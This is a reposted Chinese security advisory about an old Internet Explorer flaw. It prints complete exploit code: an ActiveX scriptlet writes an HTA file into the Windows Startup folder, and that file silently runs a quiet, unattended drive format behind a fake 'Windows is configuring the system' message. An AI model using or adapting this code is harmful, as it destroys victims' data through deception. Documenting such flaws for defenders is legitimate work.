Internet Explorer代码可以格式化本地硬盘

2008-04-09 04:33:46来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

Internet Explorer代码可以格式化本地硬盘

发布日期:1999-08-31
更新日期:1999-08-31

受影响系统:
Microsoft Windows IE
描述:
先前的文章我们解释了hta(HTML application)在Web页面中是怎么在别人访问站点的时候攻击你的机器。现在,又有了个新的危险的例子,但这个例子里,攻击的对象只是作者自己,千万不要拿别人的宝贝机器来做你的实验品~~~~

用下面的代码(注意,这些代码是For Spanish Windows'98.要想让它在中文或是英文版本下运行,得做写改动,具体得自己动手啦~~~~)

<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC">
</object>
<SCRIPT>
scr.Reset();
scr.Path="C:\\windows\\Men?inicio\\Programas\\Inicio\\automat.hta";
scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>wsh.Run('start /m format a: /q /autotest /u');alert('IMPORTANT : Windows is configuring the system. Plase do not interrupt this process.');</" "SCRIPT>";
scr.write();

代码的作者就把自己的D:,A:给格式化了,我嘛,还不敢试,哪位大哥够胆量的就
帮小弟玩玩。

这个代码是按如下工作的:
1) 用start /m (Spanish Win98 版本),这个程序以最小化的方式运行,所以用户不大会发现到。
2) 用上参数 /autotest,它可能会在某个驱动器上自动运行Format.com(不会问你Y/N的哦)
3) 接着,就会有提示的message告诉你,"IMPORTANT : Windows is configuring the system. Please do not interrupt this process."

这些都会隐藏最小化窗口里的Format信息。当然,它也会因为这个程序而会被发现。

很明显,这个漏洞是很危险的。想想你的drive里的好东东一下都没了,呵呵,哭也来不及了~~~


建议:
暂无

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:Sun Microsystems公司漏洞(LC_MESSAGES)补丁

下一篇:多家厂商rpc.amd远程缓冲区溢出漏洞